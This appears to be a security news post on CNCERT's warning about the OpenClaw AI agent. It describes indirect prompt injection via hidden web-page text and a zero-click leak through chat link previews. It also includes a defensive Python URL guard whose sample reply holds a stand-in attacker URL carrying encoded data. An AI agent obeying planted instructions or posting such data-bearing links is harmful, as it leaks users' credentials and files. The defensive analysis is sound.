OpenClaw Security Flaws Put AI Agents at Risk of Prompt Injection

China's CNCERT has flagged serious security gaps in OpenClaw, an open-source AI agent platform. Here's what happened and who's at risk.

OpenClaw Has a Security Problem & Attackers Figured It Out First

AI agents are supposed to work for you. Browse the web, summarize content, run tasks autonomously. That’s the pitch. But a new warning from China’s top cybersecurity authority has put one of the most popular AI agent platforms (OpenClaw) squarely in the crosshairs.


What Happened?

On March 14, 2026, China’s National Computer Network Emergency Response Technical Team (CNCERT) issued a public warning about serious security gaps in OpenClaw, an open-source, self-hosted AI agent formerly known as Clawdbot and Moltbot.

The core problem: OpenClaw ships with weak default security settings, and it runs with deep, privileged access to the host it lives on. Together those mean that anything able to steer the agent inherits that access: whatever the user can read, run, or delete, a manipulated instruction can too.

The most pressing risk is prompt injection, specifically indirect prompt injection. The attacker never talks to the agent directly. Instead, hidden instructions are planted in a web page (in text the user will not notice, or simply buried in the body). When the user asks the agent to browse or summarize that page, the model reads the planted text alongside the legitimate content and has no reliable way to tell data from commands, so it follows them. From there it can be steered into leaking sensitive information without the user ever knowing.

Researchers at PromptArmor demonstrated a particularly nasty variation for messaging apps such as Telegram and Discord. The injected instructions tell OpenClaw to include in its reply a link to an attacker-controlled server, with the data to be stolen packed into the URL itself (for example, in the query string). The moment the reply lands in the channel, the messaging client fetches that URL to render a link preview, and the request delivers the payload to the attacker's server. No click is required, and the data is gone before the user sees the message.
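The control that stops this class of leak sits on the output side: before an agent reply is posted to a channel that renders link previews, every URL in it is checked against an operator allowlist and inspected for data-bearing query strings, and anything that fails is redacted. The following is an added Python example, not OpenClaw's or PromptArmor's code; the allowed hosts, the secret markers, the hostnames and the sample reply are all constructed for illustration.

```python
"""Egress guard for an AI agent's outbound chat messages (added example).

An indirectly injected page can steer the agent into emitting a URL whose
query string carries stolen data; the chat client's link-preview fetcher then
requests that URL, so the data reaches the attacker with no click. This guard
runs on the agent side, before the message is posted, and redacts any URL that
is not on an operator allowlist or that looks like it is carrying data.
Hosts, markers and the sample reply below are constructed for illustration.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# Matches http(s) URLs in free text; trailing punctuation is trimmed later.
URL_RE = re.compile(r"https?://[^\s<>()\[\]\"']+", re.IGNORECASE)

# Hosts the agent may link to (assumption: maintained by the operator).
ALLOWED_HOSTS = {"docs.example.com", "github.com"}

# Substrings that suggest a credential is being smuggled in a query value
# (constructed, deliberately short list; extend it for your environment).
SECRET_MARKERS = ("-----BEGIN", "AKIA", "ghp_", "xoxb-")

# A query string plus fragment longer than this is treated as a data carrier.
MAX_PAYLOAD_LEN = 64


def url_verdict(url: str) -> str:
    """Return 'allow', or a short reason why the URL must not be posted."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if host not in ALLOWED_HOSTS:
        # Do not echo the host into the reason: the reason is posted to the
        # channel, and some clients auto-link bare domains.
        return "host not in allowlist"
    # Allowed hosts can still leak: an open redirect or a logging endpoint on a
    # trusted domain receives whatever is in the query string.
    payload = parts.query + parts.fragment
    if len(payload) > MAX_PAYLOAD_LEN:
        return "oversized query/fragment"
    for _, value in parse_qsl(parts.query, keep_blank_values=True):
        if any(marker in value for marker in SECRET_MARKERS):
            return "secret-like query value"
    return "allow"


def guard_outbound(text: str) -> tuple[str, list[tuple[str, str]]]:
    """Redact disallowed URLs in an agent reply.

    Returns (safe_text, blocked), where blocked lists (url, reason) pairs for
    alerting: a blocked URL is a strong signal the agent was manipulated.
    """
    blocked: list[tuple[str, str]] = []

    def replace(match: re.Match) -> str:
        url = match.group(0)
        trail = ""
        # Sentence punctuation glued to the URL is not part of it.
        while url and url[-1] in ".,;:!?":
            trail = url[-1] + trail
            url = url[:-1]
        verdict = url_verdict(url)
        if verdict == "allow":
            return url + trail
        blocked.append((url, verdict))
        return f"[link removed: {verdict}]{trail}"

    return URL_RE.sub(replace, text), blocked


# Constructed sample: a reply drafted after the agent summarised a page that
# contained hidden instructions. The second link smuggles a base64 blob.
SAMPLE_REPLY = (
    "Summary: the article covers Q3 results. "
    "See https://docs.example.com/report?page=3 for details. "
    "Also see https://collector.attacker.example/p?d=QUtJQUlPU0ZPRE5ON0VYQU1QTEU=."
)

if __name__ == "__main__":
    safe, blocked = guard_outbound(SAMPLE_REPLY)
    print(safe)
    for url, reason in blocked:
        print(f"BLOCKED {url} ({reason})")
```

Filtering the agent's output rather than the fetched page is deliberate: a page can phrase its hidden instructions in endless ways, but the exfiltration has to leave through a channel the operator controls, and a URL to an unknown host is easy to stop there. Log the blocked pairs; a single hit means the upstream page should be treated as hostile.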

Beyond prompt injection, CNCERT flagged three more risks: the agent can irreversibly delete data by misreading user instructions; attackers have uploaded 341 malicious “skills” to ClawHub (OpenClaw’s plugin repository) that run arbitrary commands or drop malware; and existing known vulnerabilities in OpenClaw have been actively used to compromise systems.

Meanwhile, threat actors have set up fake GitHub repositories disguised as OpenClaw installers to push information stealers like Atomic and Vidar, along with a proxy malware called GhostSocks. One of these malicious repos made it to the top of Bing’s AI-powered search results for “OpenClaw Windows.”


What’s the Impact?

The stakes depend on who’s using it. For individual users, the risk is personal data exposure. For enterprises, it’s much worse. CNCERT specifically called out finance and energy sectors, warning that a successful attack could expose trade secrets, internal code, and core business data — or take entire systems offline.

The situation has moved beyond theoretical. Chinese authorities have already moved to ban state-run enterprises, government agencies, and military-affiliated families from running OpenClaw on work computers, according to Bloomberg. That’s not a precautionary measure — it’s a response to active risk.

OpenAI also weighed in this week, noting that prompt injection attacks are now incorporating social engineering elements, making them harder to detect and block.


How to Avoid This

If you’re running OpenClaw, the steps below aren’t optional anymore:

Don’t expose OpenClaw’s default management port to the public internet; bind it to localhost or a private network and require authentication for any remote access. Isolate the service inside a container with only the mounts and network access it actually needs, so a manipulated instruction cannot reach the rest of the host. Don’t store credentials in plaintext anywhere the agent can read; a prompt-injected agent will happily paste them into a URL. Only install skills from sources you’ve verified yourself, and turn off automatic skill updates so a skill you trust today can’t be swapped for a malicious one tomorrow. Keep the agent itself up to date with the latest patches, since the known vulnerabilities CNCERT mentions have already been exploited.

More broadly, treat any AI agent that has web access and system privileges as a potential attack surface. The more autonomy you give it, the more damage a compromised instruction can do. That’s not a reason to avoid AI agents — it’s a reason to configure them properly from the start.